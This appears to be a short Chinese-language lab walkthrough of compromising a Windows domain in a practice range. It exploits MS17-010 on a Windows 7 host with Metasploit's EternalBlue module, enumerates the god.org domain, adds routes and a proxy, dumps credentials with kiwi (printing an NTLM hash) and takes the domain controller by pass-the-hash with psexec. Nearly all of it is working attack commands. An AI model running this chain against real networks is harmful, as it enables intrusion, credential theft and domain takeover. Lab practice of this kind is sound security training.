环境搭建网上有很多,此文章直接忽略此步。
kali 192.168.3.3
win7 192.168.3.31
fscan
fscan.exe -h 192.168.3.31
发现存在MS17-010漏洞
MSF
使用MSF的MS17-010攻击模块进行攻击上线
use windows/smb/ms17_010_eternalblue
set RHOST 192.168.3.31
不成功就多run几次
成功后执行shell获取交互式shell,然后执行ipconfig
发现存在192.168.52.143,猜测在内网中
内网信息收集
在MSF的交互式shell中执行:
ipconfig /all
说明该主机处在god.org
域中,该主机名为stu1
出现乱码,执行chcp 65001
查看在几个域中
net view /domain
查看域内主机
net view
定位域控,这里使用查看管理员名字来找域控主机名
net group "domain admins" /domain
域控主机的主机名是OWA,接着找域控的IP
ping owa.god.org
得到域控的IP是192.168.52.138
接着上代理
设置代理
上传frp -----缺.dll跑不起来
直接VSHELL上线设置代理
尝试MS-010
添加路由
route add 192.168.52.0 255.255.255.0 2
检测MS17-010
use scanner/smb/smb_ms17_010
set RHOST 192.168.52.138
利用
use windows/smb/ms17_010_eternalblue
set RHOST 192.168.52.138
等很久没反应,换一种方法
PTH攻击
load kiwi
creds_all
得到hash:47bf8039a8506cd67c524a03ff84ba4e
使用psexec进行横向
proxychains python3 psexec.py -hashes :47bf8039a8506cd67c524a03ff84ba4e administrator@192.168.52.138 cmd
成功拿下域控